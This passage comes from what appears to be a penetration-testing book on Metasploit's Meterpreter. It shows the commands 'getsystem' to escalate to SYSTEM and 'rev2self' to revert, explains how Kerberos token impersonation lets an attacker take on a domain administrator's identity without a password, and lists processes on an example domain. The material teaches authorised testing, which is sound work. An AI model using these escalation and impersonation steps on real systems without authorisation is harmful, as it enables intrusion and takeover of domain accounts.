Meterpreter
87
meterpreter >
use priv
Loading extension priv...success.
meterpreter >
getsystem
...got system (via technique 4).
meterpreter >
getuid
Server username: NT AUTHORITY\SYSTEM
To switch back to the previous user account where we initially got our
Meterpreter shell, we’d use
rev2self
.
Token Impersonation
In
token impersonation
, we grab a Kerberos token on the target’s machine and
then use it in place of authentication to assume the identity of the user that
originally created that token. Token impersonation is very beneficial for pen-
etration tests and can be one of Meterpreter’s most powerful features.
Consider the following scenario, for example: You’re performing a pene-
tration test at your organization, and you successfully compromise the system
and establish a Meterpreter console. A domain administrator account has
logged on within the last 13 hours. When this account logs on, a Kerberos
token is passed to the server (single sign-on) and is valid for a certain period
of time. You exploit this system via the valid and active Kerberos token, and
through Meterpreter you successfully assume the role of a domain adminis-
trator, without needing the password. Then you hack a domain administra-
tor account or go after a domain controller. This is probably one of the
easiest ways to gain access into a system and just another example of why
Meterpreter is so useful.
Using ps
For this example, we’ll use the Meterpreter function
ps
to list the applications
running and show under which account they are running. We’ll use the
domain name
SNEAKS.IN
and the user account
ihazdomainadmin
.
meterpreter >
ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
380 cmd.exe x86 0
SNEAKS.IN\ihazdomainadmin
\System\
Root\System32\cmd.exe
. . . SNIP . . .
meterpreter >